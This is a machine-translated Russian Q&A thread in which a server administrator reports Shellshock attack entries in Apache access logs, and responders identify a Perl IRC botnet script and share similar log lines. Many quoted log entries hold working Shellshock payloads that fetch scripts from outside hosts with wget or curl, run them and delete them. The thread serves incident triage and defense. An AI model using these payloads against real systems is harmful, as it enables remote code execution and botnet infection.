Баш Снаряды Джурат Perl сценарий
Я увидел следующую строку под /var/log/apache2/access_log:
"GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
Я еще не удосужился исправить патч. Я немедленно выключил машину.
Кто-нибудь видел это в своих журналах и / или изучал скрипт Perl, найденный на http://213.5.67.223/jurat? Это кажется довольно мягким, но я хочу знать, насколько я должен волноваться?
На линии 338 вы можете увидеть shell функция выполняет команду оболочки, которая была получена от кого-то на другом конце канала IRC
my @resp=`$comando 2>&1 3>&1`;
Это выполняется с тем же уровнем пользователя, что и apache сервер. Я просто надеюсь, что они не смогли повысить привилегии.
3 ответа
Я не смотрел на детали, но это не выглядит доброжелательно для меня:
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
Это выглядит для меня как какой-то скрипт ботнета. Страшно. Поправляйся, люди.
ОБНОВЛЕНИЕ: анализ в этом блоге:
Если сценарий успешно выполнен, то зараженный хост подключится к каналу IRC, жестко заданному в сценарии, и будет ждать команды ".
Это хуже, чем Бадди МакБэд.
Смотрите ссылку на аналогичную тему: https://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock
Это попытка сценария-обманщика использовать уязвимость bash для запуска IRC-бота на основе Perl-сценария. Если вы обновили bash, и, кроме того, если вы запускаете apache под chroot, как вам, вам не о чем беспокоиться. Я вижу несколько версий этого в моем журнале (см. Ниже), по крайней мере, через день с 27 сентября... это просто шум.
12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
Еще одна попытка выполнения сценария (сценария Python), которую я только что заметил сегодня... ПРИМЕЧАНИЕ: google-traffic-analytics.com, где загружается сценарий Python, конечно, не имеет ничего общего с Google.
cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
У меня были такие строки в access_log, но некоторые были немного другими:
""() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
=> теперь вы можете скачать его и получить скрипт Peril vilain: http://pastie.org/9604492
хороший пример использования другого бота IRC:) надеюсь, это поможет